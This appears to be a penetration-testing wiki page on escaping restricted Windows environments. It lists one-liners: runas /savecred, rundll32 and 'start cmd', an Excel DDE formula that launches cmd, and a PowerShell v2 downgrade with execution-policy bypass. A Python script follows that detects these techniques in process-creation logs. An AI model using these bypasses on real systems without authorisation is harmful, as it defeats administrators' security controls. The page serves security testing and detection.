✅ Environments escape

Penetration Testing Wiki

Escape Citrix or cmd.exe disabled by SRP

runas /savecred /user:$USERNAME calc.exe
RUNDLL32.EXE <dllname>,<entrypoint> <optional arguments>


E.g.:

rundll32.exe user32.dll,LockWorkStation
start cmd

Escape Excel

Excel command execution through a macro:

=cmd|'/C calc.exe'!__xA1

Escape PowerShell

PowerShell evasion inside ConstrainedLanguage mode:

Method 1: Downgrade PowerShell to v2

powershell.exe -Version 2 -ep bypass -nop

Method 2: runas PowerShell?
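
The detection side of the techniques listed on this page, as an added example that is not part of the original wiki: a Python triage function over process-creation events (for instance Sysmon Event ID 1 or Security Event ID 4688 records exported to dicts). The event field names, rule names and sample events are assumptions constructed for illustration.

```python
import re

# -Version and every abbreviation powershell.exe accepts (-v, -ve, ... -version),
# prefixed by "-" or "/", requesting engine 2 or 2.0.
PS_V2 = re.compile(
    r'(?i)\bpowershell(?:\.exe)?"?\s(?:.*\s)?[-/]v(?:e(?:r(?:s(?:i(?:on?)?)?)?)?)?'
    r'\s+"?2(?:\.0)?(?=["\s]|$)')
# runas invoked with /savecred (stores or reuses saved credentials).
RUNAS_SAVED = re.compile(r'(?i)\brunas(?:\.exe)?"?\s(?:.*\s)?/savecred\b')
# Child image is a command interpreter or rundll32 (optionally with a path).
SHELL_CHILD = re.compile(
    r'(?i)^"?(?:[^"\s]*\\)?(?:cmd|powershell|rundll32)(?:\.exe)?"?(?:\s|$)')
# Parent image is an Office application, e.g. Excel evaluating a DDE formula.
OFFICE_PARENT = re.compile(r'(?i)(?:^|\\)(?:excel|winword)\.exe$')


def classify(event):
    """Return the names of all rules that fire for one process-creation event."""
    cmd, parent = event["cmdline"], event.get("parent", "")
    hits = []
    if PS_V2.search(cmd):
        hits.append("powershell_v2_downgrade")
    if RUNAS_SAVED.search(cmd):
        hits.append("runas_savecred")
    if OFFICE_PARENT.search(parent) and SHELL_CHILD.search(cmd):
        hits.append("office_spawned_shell")
    return hits


# Constructed sample events, not taken from a real log.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -Version 2 -ep bypass -nop"},
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -File C:\scripts\v2\run.ps1 -Verbose"},
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": r"runas /savecred /user:CORP\alice calc.exe"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": "CMD.EXE /C calc.exe"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(classify(ev) or ["no_match"], "<-", ev["cmdline"])
```

The second sample event is a benign control: a `v2` path component and `-Verbose` must not trigger the downgrade rule.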
